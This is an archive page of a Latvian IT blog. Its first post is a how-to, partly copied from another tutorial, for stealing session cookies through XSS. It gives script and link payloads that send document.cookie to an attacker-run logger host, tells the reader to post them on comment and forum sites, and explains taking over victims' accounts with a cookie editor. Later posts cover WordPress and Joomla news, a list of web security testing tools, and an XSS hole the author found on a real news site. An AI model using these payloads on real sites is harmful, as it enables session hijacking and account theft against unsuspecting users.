IT sviestapika » Web

Kā nodemonstrēt XSS ievainojamību

Kaspars — Sat, 21 Jan 2012 16:02:35 +0000

Ja ir nepieciešams nodemonstrēt kādā veidā var izmantot XSS ievainojamību kādā mājas lapā, tad var izmantot autora izveidoto php skriptu, lai nebūtu jāizveido divritenis no sākuma.

Otrs veids ir izmantot šo pieeju.

Savkārt ievietot jau mājaslapā pārsūtāmo informāciju visbiežāk izdevies izmantojot šo piemēru:

script>
new Image().src=”http://jehiah.com/_sandbox/log.cgi?c=”+encodeURI(document.cookie);

/script>

In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim’s computer (see HTTP cookie theft).

Here we show how you can hack a session using javascript and php.

What is a cookie?

A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.

What can we do after stealing cookie?

Well,as we know web sites authenticate their user’s with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.

This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.

PHP Code:

Save the script as a cookielogger.php on your server.
(You can get any free webhosting easily such as justfree,x10hosting etc..)

Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.

Now for the hack to work we have to inject this piece of javascript into the target’s page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.

The best way is to look for user interactive sites which contain comments or forums.

Post the following code which invokes or activates the cookielogger on your host.

Code:

script type=”text/javascript” language=”Java script”>// document.location="http://www.yourhost.com/cookielogger.php?cookie=" + document.cookie;
// ]]>
/script>

Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.

Code:

a href=”java script:document.location=’http://www.yourhost.com/cookielogger.php?cookie=’+document.cookie;”>Click here!

Clicking an image also can activate the script.For this purpose you can use the below code.

Code:

img src=”URL OF THE IMAGE” alt=”" />

All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver

In the above codes please remove the space in between javascript.

Hijacking the Session:

Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin or you may find other plugins as well.

Go to the target site–>open cookie editor–>Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account. Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573

Don’t forget to comment if you like my post.
by hackiteasy

Iznācis wordpress 3.3

Kaspars — Sun, 01 Jan 2012 12:28:27 +0000

WordPress nebeidz pārsteigt un ar pilno jauno iespēju sarakstu var iepazīties te. Mana līdzšenējā tēma gan atteicās sadarboties ar 3.3, bet ar to ir jārēķinās veicot atjaunināšanu. Related posts: Iznācis WordPress 3.0.5 ar drošības labojumiem WordPress update crash Atjaunojam wordpress Related posts:

Joomla maina izstrādes stratēģiju.

Kaspars — Sun, 28 Aug 2011 07:18:25 +0000

Joomla ir izmainījusi savu izstrādes stratēģiju no iespēju (fīču) balstītu uz izstrādes laika balstītu.
Savas priekšrocības ir abām pieejām un izskatās, ka viņiem bija pēdējais laiks kaut ko mainīt.
Kādreiz bija – iznāk jauna versija un ir daudz uzlabojumu. Tagad būs biežāki, bet mazāki uzlabojumi.
Par to var palasīt te un noskatīties video te.

WEB skype beidzot pieejams grupu čats

Kaspars — Fri, 01 Jul 2011 07:02:27 +0000

Diezgan sen sekoju projekta https://imo.im attīstībai. Projekts laika gaitā ir baigi modernizējies un šodien pamanīju, ka novērsuši lielāko mīnusu- nebija pieejams grupu čats. Projekta izmaiņas, kopš to lietoju: Parādījās sarakstes vēsture Profila bildes Grupu čats Kāda vēl fīča tiks iestrādāta … Continue reading → Related posts:

WordPress update crash

Kaspars — Sun, 26 Jun 2011 19:16:41 +0000

Problēma: Atjaunojot wordpress izmantojot automātisko atjaunināšanas iespēju tas regulāri beidzass ar kļūdu. Šo problēmu atrisina plugins ftp-upgrade-fix.1.0 Related posts: Atjaunojam wordpress Draugiem.lv pase priekš wordpress Paplašinām wordpress iespējas Related posts:

WEB testēšanas rīki

Kaspars — Sun, 20 Mar 2011 12:11:39 +0000

Galvenie testēšanas rīki, kurus izmantot WEB aplikāciju testēšanā (šos rīkus vajag lietot ar prātu, jo tie var radīt lielu noslodzi):

Web application vulnerability scanner- Wapiti
Web Application Attack and Audit Framework W3af
Web server scanner Nikto2
Brute force directories and files names on web/application servers DirBuster
WEB proxy WebScarab
Web application security testing tool Grendel-Scan
Tamper Data- ļauj mainīt sūtāmo parametru vērtības
Metasploit penetration testing framework

Kapitals.lv

Kaspars — Sat, 19 Feb 2011 19:21:26 +0000

Šodien kapitals.lv mājas lapa satura vietā izvada datubāzes kļūdu. Šāda lieta viņiem jau gadījās ātrāk.

Iznācis WordPress 3.0.5 ar drošības labojumiem

Kaspars — Thu, 10 Feb 2011 08:11:53 +0000

Iznākusi WordPress drošības labojumu versija 3.0.5. Apraksts pieejams šeit. Related posts: Atbrīvojamies no komentāru spama Aizstājam vai izmainām izvadāmo kodu izmantojot javascript Atjaunojam wordpress Related posts:

User friendly url

Kaspars — Mon, 07 Feb 2011 09:41:42 +0000

Ir elegants veids kā izveidot lietotājam draudzīgu url pat gadījumā, ja mājas lapas CRM to nepieļauj un nav iespējams veikt izmaiņas servera konfigurācijā (uzstādīt server side redirection ar .htaccess vai .config).
Piemēram, ja ir lapa, kura neuztur lietotājam draudzīgus url- http://kautkas.lv/?i=3 un ir nepieciešams, lai adrese izskatītos- http://kautkas.lv/atrodi-sevi/
Tad to var izdarīt izveidojot direktoriju atrodi-sevi un tajā ievietojot failu index.php ar saturu:

Jāatceras, ka šāda adrese ir tikai lietotājiem draudzīga, nevis meklētājiem.

www.zz.lv un XSS

Kaspars — Mon, 17 Jan 2011 07:00:51 +0000

Mājās drusku pabakstoties atklājās, ka Zemgales ziņas mājas lapas meklēšanas funkcionalitātē ir XSS ievainojamība. Pieņemu, ka tāda pati problēma ir visās AS Dienas reģionālo avīžu mājas lapās.
Pilnībā atvēzēties liedz tas, ka tiek atfiltrēts „=” simbols.
Par XSS var palasīt:

http://hakipedia.com/index.php/Cross_Site_Scripting
http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
http://ha.ckers.org/xss.html
http://www.martani.net/2009/08/xss-steal-passwords-using-javascript.html